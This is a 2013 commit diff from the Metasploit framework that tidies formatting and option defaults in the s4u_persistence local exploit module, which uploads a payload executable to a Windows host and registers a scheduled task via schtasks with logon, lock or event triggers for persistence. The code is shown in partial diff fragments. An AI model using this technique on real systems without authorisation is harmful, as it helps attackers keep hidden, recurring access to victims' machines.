Land #2053, normalize s4u_persistence module

unstable
William Vu 2013-07-03 10:55:52 -05:00
commit ad83ef826c
1 changed files with 21 additions and 29 deletions


@ -42,19 +42,19 @@ class Metasploit3 < Msf::Exploit::Local
'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post 'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'References' => [ 'References' => [
[ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
[ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/'] [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ]
] ]
)) ))
register_options( register_options(
[ [
OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']),
OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires']), OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', '0']),
OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['logon', 'lock', 'unlock','schedule', 'event']]), OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['event', 'lock', 'logon', 'schedule', 'unlock']]),
OptString.new('REXENAME',[false, 'Name of exe on remote system']), OptString.new('REXENAME', [false, 'Name of exe on remote system']),
OptString.new('RTASKNAME',[false, 'Name of exe on remote system']), OptString.new('RTASKNAME', [false, 'Name of task on remote system']),
OptString.new('PATH',[false, 'PATH to write payload']) OptString.new('PATH', [false, 'PATH to write payload', '%TEMP%'])
], self.class) ], self.class)
register_advanced_options( register_advanced_options(
@ -108,7 +108,6 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Generate name for payload # Generate name for payload
# Returns name # Returns name
def generate_rexename def generate_rexename
rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
if not rexename =~ /\.exe$/ if not rexename =~ /\.exe$/
@ -119,10 +118,9 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Generate Path for payload upload # Generate Path for payload upload
# Returns path for xml and payload # Returns path for XML and payload
def generate_path(rexename) def generate_path(rexename)
# generate a path to write payload and xml # Generate a path to write payload and XML
path = datastore['PATH'] || expand_path("%TEMP%") path = datastore['PATH'] || expand_path("%TEMP%")
xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
rexe_path = "#{path}\\#{rexename}" rexe_path = "#{path}\\#{rexename}"
@ -132,24 +130,25 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Upload the executable payload # Upload the executable payload
# Returns boolean for success # Returns boolean for success
def upload_rexe(path, payload) def upload_rexe(path, payload)
vprint_status("Uploading #{path}") vprint_status("Uploading #{path}")
if file? path
fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") if file? path
end fail_with(Exploit::Failure::Unknown, "File #{path} already exists... Exiting")
end
begin begin
write_file(path, payload) write_file(path, payload)
rescue => e rescue => e
fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}") fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}")
end end
print_status("Successfully uploaded remote executable to #{path}") print_status("Successfully uploaded remote executable to #{path}")
end end
############################################################## ##############################################################
# Creates a scheduled task, exports as XML, deletes task # Creates a scheduled task, exports as XML, deletes task
# Returns normal XML for generic task # Returns normal XML for generic task
def create_xml(rexe_path) def create_xml(rexe_path)
xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml") xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml")
xml_file = File.new(xml_path,"r") xml_file = File.new(xml_path,"r")
@ -162,18 +161,18 @@ class Metasploit3 < Msf::Exploit::Local
ut = vt['lpSystemTime'].unpack("v*") ut = vt['lpSystemTime'].unpack("v*")
t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5])
rescue rescue
print_warning("Could not read system time from victim...using your local time to determine creation date") print_warning("Could not read system time from victim... Using your local time to determine creation date")
t = ::Time.now t = ::Time.now
end end
date = t.strftime("%Y-%m-%d") date = t.strftime("%Y-%m-%d")
time = t.strftime("%H:%M:%S") time = t.strftime("%H:%M:%S")
# put in correct times # Put in correct times
xml = xml.gsub(/DATEHERE/, "#{date}T#{time}") xml = xml.gsub(/DATEHERE/, "#{date}T#{time}")
domain, user = client.sys.config.getuid.split('\\') domain, user = client.sys.config.getuid.split('\\')
# put in user information # Put in user information
xml = xml.sub(/DOMAINHERE/, user) xml = xml.sub(/DOMAINHERE/, user)
xml = xml.sub(/USERHERE/, "#{domain}\\#{user}") xml = xml.sub(/USERHERE/, "#{domain}\\#{user}")
@ -185,7 +184,6 @@ class Metasploit3 < Msf::Exploit::Local
# Takes the XML, alters it based on trigger specified. Will also # Takes the XML, alters it based on trigger specified. Will also
# add in expiration tag if used. # add in expiration tag if used.
# Returns the modified XML # Returns the modified XML
def add_xml_triggers(xml) def add_xml_triggers(xml)
# Insert trigger # Insert trigger
case datastore['TRIGGER'] case datastore['TRIGGER']
@ -237,7 +235,6 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Creates end boundary tag which expires the trigger # Creates end boundary tag which expires the trigger
# Returns XML for expire # Returns XML for expire
def create_expire_tag() def create_expire_tag()
# Get local time, not system time from victim machine # Get local time, not system time from victim machine
begin begin
@ -245,7 +242,7 @@ class Metasploit3 < Msf::Exploit::Local
ut = vt['lpSystemTime'].unpack("v*") ut = vt['lpSystemTime'].unpack("v*")
t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5])
rescue rescue
print_error("Could not read system time from victim...using your local time to determine expire date") print_error("Could not read system time from victim... Using your local time to determine expire date")
t = ::Time.now t = ::Time.now
end end
@ -261,7 +258,6 @@ class Metasploit3 < Msf::Exploit::Local
# Creates trigger XML for session state triggers and replaces # Creates trigger XML for session state triggers and replaces
# the time trigger. # the time trigger.
# Returns altered XML # Returns altered XML
def create_trigger_tags(trig, xml) def create_trigger_tags(trig, xml)
domain, user = client.sys.config.getuid.split('\\') domain, user = client.sys.config.getuid.split('\\')
@ -283,7 +279,6 @@ class Metasploit3 < Msf::Exploit::Local
# Creates trigger XML for event based triggers and replaces # Creates trigger XML for event based triggers and replaces
# the time trigger. # the time trigger.
# Returns altered XML # Returns altered XML
def create_trigger_event_tags(log, line, xml) def create_trigger_event_tags(log, line, xml)
# Fscked up XML syntax for windows event #{id} in #{log}, weird spacind # Fscked up XML syntax for windows event #{id} in #{log}, weird spacind
# used to maintain natural Windows spacing for XML export # used to maintain natural Windows spacing for XML export
@ -304,11 +299,10 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Takes the XML and a path and writes file to filesystem # Takes the XML and a path and writes file to filesystem
# Returns boolean for success # Returns boolean for success
def write_xml(xml, path, rexe_path) def write_xml(xml, path, rexe_path)
if file? path if file? path
delete_file(rexe_path) delete_file(rexe_path)
fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting") fail_with(Exploit::Failure::Unknown, "File #{path} already exists... Exiting")
end end
begin begin
write_file(path, xml) write_file(path, xml)
@ -322,7 +316,6 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Takes path and delete file # Takes path and delete file
# Returns boolean for success # Returns boolean for success
def delete_file(path) def delete_file(path)
begin begin
file_rm(path) file_rm(path)
@ -334,7 +327,6 @@ class Metasploit3 < Msf::Exploit::Local
############################################################## ##############################################################
# Takes path and name for task and creates final task # Takes path and name for task and creates final task
# Returns boolean for success # Returns boolean for success
def create_task(path, schname, rexe_path) def create_task(path, schname, rexe_path)
# create task using XML file on victim fs # create task using XML file on victim fs
create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"") create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"")